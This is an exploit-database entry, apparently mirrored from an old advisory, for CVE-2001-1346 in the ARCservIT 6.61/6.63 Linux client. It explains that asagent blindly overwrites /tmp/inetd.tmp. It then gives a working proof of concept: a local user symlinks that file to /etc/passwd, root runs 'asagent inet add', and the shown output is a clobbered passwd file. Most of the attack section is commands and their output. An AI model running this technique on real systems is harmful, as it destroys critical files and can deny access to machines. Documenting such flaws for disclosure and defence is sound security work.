[] NeoSense
E X P L O I T S
title author type platform port cve id

ARCservIT 6.61/6.63 Client - inetd.tmp Arbitrary File Overwrite

Author: Jonas Eriksson
type: local
platform: linux
port: 
date_added: 2001-05-18 
date_updated: 2012-08-28 
verified: 1 
codes: CVE-2001-1346;OSVDB-6765 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/2748/info

ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to corrupt arbitrary files.

When it runs with the parameters 'inet add', 'asagent', opens (and overwrites it if it exists) a file in /tmp called 'inetd.tmp'. 'asagent' does not check to make sure that this file already exists or that is a symbolic link to another file.

This may allow malicious local users to corrupt critical system files.

je@boxname~> ln -s /etc/passwd /tmp/inetd.tmp

And root:

root@boxname# /usr/CYEagent/asagent inet add

Then,

je@boxname~> cat /etc/passwd
asagentd 6051/tcp # ARCserve agent
asagentd 6051/udp # ARCserve agent
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.